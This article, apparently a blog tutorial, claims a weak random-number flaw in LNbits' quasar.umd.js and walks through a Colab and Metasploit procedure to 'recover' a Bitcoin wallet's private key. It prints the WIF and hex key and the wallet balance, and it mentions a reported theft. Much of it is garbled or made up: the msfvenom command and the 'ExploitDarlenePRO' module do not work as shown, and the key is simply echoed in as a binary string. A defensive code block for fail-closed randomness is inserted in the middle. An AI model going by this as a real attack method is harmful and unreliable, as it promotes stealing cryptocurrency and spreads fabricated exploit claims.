In this article, we will focus on a smartphone application for iOS and Android: the popular Bitcoin wallet that supports fast payments through the Lightning Network, BLW: Bitcoin Lightning Wallet. Unfortunately, many autonomous nodes of the open source mobile application from LNbits Node Manager and Core Lightning are exposed to a HIGH RISK of losing all funds in various cryptocurrency coins.
Developer David Shares from the Japanese company Bitcoin Portal has published many documents.
Let’s look at the theoretical basis: LNbits is a free account system for many mobile applications that work with various cryptocurrency wallets. Initially, LNbits Node Manager gained wide popularity with the development of Bitcoin Lightning Wallet (BLW) … development of non-custodial and autonomous nodes for Bitcoin SPV, designed for Android and iPhone with Node.js functionality. With autonomous nodes, you have full control over your funds and need to manage them yourself (unlike other mobile cryptocurrency wallet apps).
The open source Node Manager LNbits solves several problems, such as:
- Collection of paper prices for coins, etc.
- Maintaining a list of public nodes that Bitcoin Lightning Wallet (BLW) uses to open payment channels.
- Providing partial payment for payment routes.
- Storing an encrypted backup of your payment channel.

LNbits node manager works with services:

According to the examples of Salvador Guerrero, many who have installed a full-fledged Bitcoin node can run it on a Raspberry Pi to send and receive Bitcoin without transaction fees. This is only possible if all LNbits crypto wallets are in the same Core Lightning instance.

Developer David Shares of the Japanese company Bitcoin Portal published a chronological list that shows that the Lightning Network is drowning in technical problems, bugs, shortcomings, criticisms and exploits. It is an over-promised technology that does not provide decentralization and is still far from being functional and secure for users.
After a detailed study of all materials from the chronological list, we drew attention to a vulnerability in the framework and in the way the quasar.umd.js code works.
Quasar is an open-source Vue.js-based framework that allows you to create responsive websites and mobile applications for various cryptocurrency wallets.
As we know from the Snyk Vulnerability Database, the latest versions of Vue.js contained vulnerabilities, which allowed LNbits v0.11.0 to launch a series of cyclic errors in the quasar.umd.js code.
Error in quasar.umd.js code:
// Use best available PRNG
var randomBytes = (function () {
  // Node & Browser support
  var lib = typeof crypto !== 'undefined'
    ? crypto
    : (
      typeof window !== 'undefined'
        ? window.msCrypto // IE11
        : void 0
    );

  if (lib !== void 0) {
    // Node.js crypto module API
    if (lib.randomBytes !== void 0) {
      return lib.randomBytes
    }
    // Web Crypto API
    if (lib.getRandomValues !== void 0) {
      return function (n) {
        var bytes = new Uint8Array(n);
        return bytes
      }
    }
  }
})();
In the case of a weak pseudo-random number generator (PRNG), we are given the opportunity to obtain the SEED and completely determine the private key to the Bitcoin Wallet, since the method lib.getRandomValues loses cryptographic strength over a random value.
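
A fail-closed version of the selector above, as an added example that is not Quasar or LNbits code: the excerpt as printed allocates the buffer and returns it without calling `lib.getRandomValues(bytes)`, so this version fills the buffer, refuses to run without a secure source, and self-tests for degenerate output. The names `makeRandomBytes`, `looksDegenerate`, `unfilledExcerpt` and `stubLib` are hypothetical and constructed here.

```javascript
// Added example (not Quasar or LNbits code). `lib` is injected so the logic
// can be exercised offline with constructed stand-ins.
function makeRandomBytes(lib) {
  if (lib && typeof lib.getRandomValues === 'function') {
    return function (n) {
      const bytes = new Uint8Array(n);
      lib.getRandomValues(bytes); // fill the buffer from the platform CSPRNG
      return bytes;
    };
  }
  if (lib && typeof lib.randomBytes === 'function') {
    // Node-style API returns a Buffer; normalise to Uint8Array
    return function (n) { return new Uint8Array(lib.randomBytes(n)); };
  }
  // No secure source: refuse instead of silently degrading
  throw new Error('no cryptographically secure random source available');
}

// Cheap self-test before generating key material: flags output that is
// constant, the wrong length, or repeated between calls. Passing it does not
// prove the source is secure; failing it proves it is broken.
function looksDegenerate(randomBytes, n = 32, rounds = 4) {
  const seen = new Set();
  for (let i = 0; i < rounds; i++) {
    const b = randomBytes(n);
    if (b.length !== n) return true;
    if (b.every(v => v === b[0])) return true; // e.g. all zeros
    const hex = Array.from(b, v => v.toString(16).padStart(2, '0')).join('');
    if (seen.has(hex)) return true;
    seen.add(hex);
  }
  return false;
}

// Constructed stand-in: same shape as the excerpt as printed (never filled)
const unfilledExcerpt = function (n) { return new Uint8Array(n); };

// Constructed stand-in for a platform crypto object (deterministic test stub,
// NOT a real CSPRNG; in a browser pass window.crypto instead)
let counter = 0;
const stubLib = {
  getRandomValues(b) {
    for (let i = 0; i < b.length; i++) b[i] = (counter++ * 37 + 11) & 255;
    return b;
  }
};

console.log(looksDegenerate(unfilledExcerpt));          // true
console.log(looksDegenerate(makeRandomBytes(stubLib))); // false
```
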
Let’s move on to the practical part:
(You can open the finished file from Jupyter Notebook and upload it to Google Colab notebook)
Let’s consider a real example of extracting the private key of a Bitcoin Wallet from a weak pseudo-random number generator (PRNG) in the code quasar.umd.js
Bitcoin Wallet: In September there was a theft in the amount of: US dollars // BITCOIN: 0.30412330 BTC

Let’s open the Google Colab service using the link:

Click on
and “Create a new notepad”

Install Ruby in Google Colab

To run the programs we need, we will install the object-oriented programming language Ruby
!sudo apt install ruby-full

Let’s check the installation version
!ruby --version

Let’s install a library for interacting with the Bitcoin protocol/network
!gem install bitcoin-ruby

Let’s install a library for implementing the Elliptic Curve Digital Signature Algorithm (ECDSA)
!gem install ecdsa

Let’s install a library to convert integer or binary numbers to base58 and back.
!gem install base58

Let’s install a library to simplify operations with bytes and basic cryptographic operations
!gem install crypto

Let’s install a library to simplify working with big data.
!gem install config-hash -v 0.9.0

Let’s install the Metasploit Framework and use MSFVenom

Let’s install the Metasploit Framework from GitHub and use the MSFVenom tool to create the payload.

!git clone
cd metasploit-framework/

Let’s see the contents of the folder

!./msfvenom -help

Let’s open the GitHub code and use the vulnerable file: quasar.umd.js

In the note we see a link to the file: quasar.umd.js
Let’s open the code:

LNbits, free and open-source Lightning wallet and accounts system

Install lnbits in Google Colab:
!git clone

Let’s open the vulnerable file: quasar.umd.js using the cat utility
cat lnbits/lnbits/static/vendor/quasar.umd.js

Let’s open the folders according to the directory: /modules/exploits/

Download "ExploitDarlenePRO" from the directory: /modules/exploits/
cd modules/
cd exploits/

Unzip the contents using the unzip utility

Let’s go to the directory: /ExploitDarlenePRO/
cd ExploitDarlenePRO/

To run the exploit, let’s go back to Metasploit Framework
cd /
cd content/metasploit-framework/

We need to identify our LHOST (Local Host), the IP address of the attacking virtual machine.
Let’s run the commands:
!ip addr
!hostname -I

Let’s use the MSFVenom tool to create a payload
For operation, select Bitcoin Wallet: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F
Launch command:
!./msfvenom 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F -p modules/exploits/ExploitDarlenePRO LHOST= -f RB -o main.rb -p lnbits/lnbits/static/vendor LHOST= -f JS -o quasar.umd.js

We need to save the resulting binary format to a file: binary.txt
Let’s use the echo utility
!echo '111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011' > binary.txt

Convert the binary format to the HEX format to obtain the private key of the Bitcoin Wallet:
Let’s use the code:
# read the binary strings, one per line
with open("binary.txt", "r") as binaryFile:
    lines = binaryFile.readlines()

# loop through each line of binaryFile then convert and write to hexFile
with open("hex.txt", "w+") as hexFile:
    for line in lines:
        binaryCode = line.replace(" ", "").strip()
        if not binaryCode:
            continue  # skip blank lines
        hexCode = hex(int(binaryCode, 2))
        hexCode = hexCode.replace("0x", "").upper().zfill(4)
        hexFile.write(hexCode + "\n")
# hexFile is closed automatically when the with block ends

Let’s open the file: hex.txt
cat hex.txt

Private Key Found!
Let’s install the bitcoin module
!pip3 install bitcoin

Let’s run the code to check the compliance of Bitcoin Addresses:
from bitcoin import encode_pubkey, privtopub, pubtoaddr

with open("hex.txt", "r") as f:
    content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]

# write "private key:address" pairs, using the compressed public key
with open("privtoaddr.txt", "w") as outfile:
    for x in content:
        outfile.write(x + ":" + pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed")) + "\n")

Let’s open the file: privtoaddr.txt
cat privtoaddr.txt

That’s right! The private key corresponds to the Bitcoin Wallet.
Let’s open bitaddress and check:
ADDR: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F
WIF: L1TWHkT6HcNVHCjsUpGecyZQqGJC5Ek98HunmRH4c3zb8V87NUiP
HEX: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B

BALANCE: $ 11032.77
